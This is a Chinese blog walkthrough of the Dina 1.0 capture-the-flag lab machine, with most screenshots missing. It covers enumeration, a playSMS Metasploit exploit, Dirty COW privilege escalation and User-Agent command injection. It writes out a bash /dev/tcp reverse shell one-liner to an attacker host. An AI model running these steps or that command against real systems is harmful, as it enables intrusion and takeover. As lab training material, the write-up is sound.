靶机实战-Dina 1.0

Dina 1.0靶机实战

1、主机发现

在这里插入图片描述
目标IP:192.168.232.157

2、端口扫描

在这里插入图片描述

3、端口详细信息扫描

在这里插入图片描述
只开放80端口

4、访问80端口–http服务

主页啥都没有,直接dirb扫一下目录
在这里插入图片描述
依次访问目录:
在这里插入图片描述
index就是主页,就不看了
发现robot中有五个目录:
在这里插入图片描述
依次访问:
在这里插入图片描述
在这里插入图片描述
其它两个页面跟第一个一样
继续访问:
//在/secure中发现一个zip文件而且可以下载
在这里插入图片描述
下载backup.zip文件,解压发现需要密码
在这里插入图片描述
不知道密码,先pass,去网页源码里看看有没有东西
发现http://192.168.10.181/nothing/源码中有记录密码
在这里插入图片描述
尝试用得到的密码解压,用密码freedom成功解压,解压发现是一个类似mp3的文件
在这里插入图片描述
在这里插入图片描述
用播放器打不开
在这里插入图片描述
用记事本打开:
在这里插入图片描述
发现url :/SecreTSMSgatwayLogin //Login?猜测是登录页面
在这里插入图片描述
果然是,然后尝试使用文件中的用户名touhid,密码freedom登录
在这里插入图片描述
在这里插入图片描述
不对?!,继续依次尝试在nothing源码中找到的密码
在这里插入图片描述
在这里插入图片描述
diana登录成功

在进入后台后,发现是playSMS,可通过metasploit查看相关漏洞看能否利用
在这里插入图片描述
使用use exploit/multi/http/playsms_filename_exec 进行漏洞利用
在这里插入图片描述
添加渗透攻击模块中的参数
在这里插入图片描述
exploit执行后成功,获取meterpreter权限
//上面两个exploit都可以获得meterpreter权限

5、提权

//查看内核版本,用脏牛提权
在这里插入图片描述
编译and执行:
在这里插入图片描述
在这里插入图片描述
提权成功

提权方式二

在网页中发现文件上传,并发现要求上传CSV文件:
在这里插入图片描述
但不知道文件上传后的路径在哪,所以文件上传漏洞没法使用
用searchsploit命令查询后门文件:
在这里插入图片描述
发现本页面后门文件42044.txt,查看其内容
在这里插入图片描述
根据文件所说,将命令写入表格:
在这里插入图片描述
去页面进行文件上传并抓包:
在这里插入图片描述
根据文件中提示,将user-agent修改为想要执行的命令,发现成功执行
在这里插入图片描述
利用此命令执行漏洞,进行反弹shell:
echo “bash -i>&/dev/tcp/192.168.232.130/1234 0>&1” | bash
在这里插入图片描述
点击GO,查看kali//kali提权开启监听
在这里插入图片描述
拿到shell,接下来提权
利用脏牛提权://下载dirty.c
因为上面已经用过脏牛提权,重新做的话要删除,重来,所以就不再做了
在这里插入图片描述
在这里插入图片描述

  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值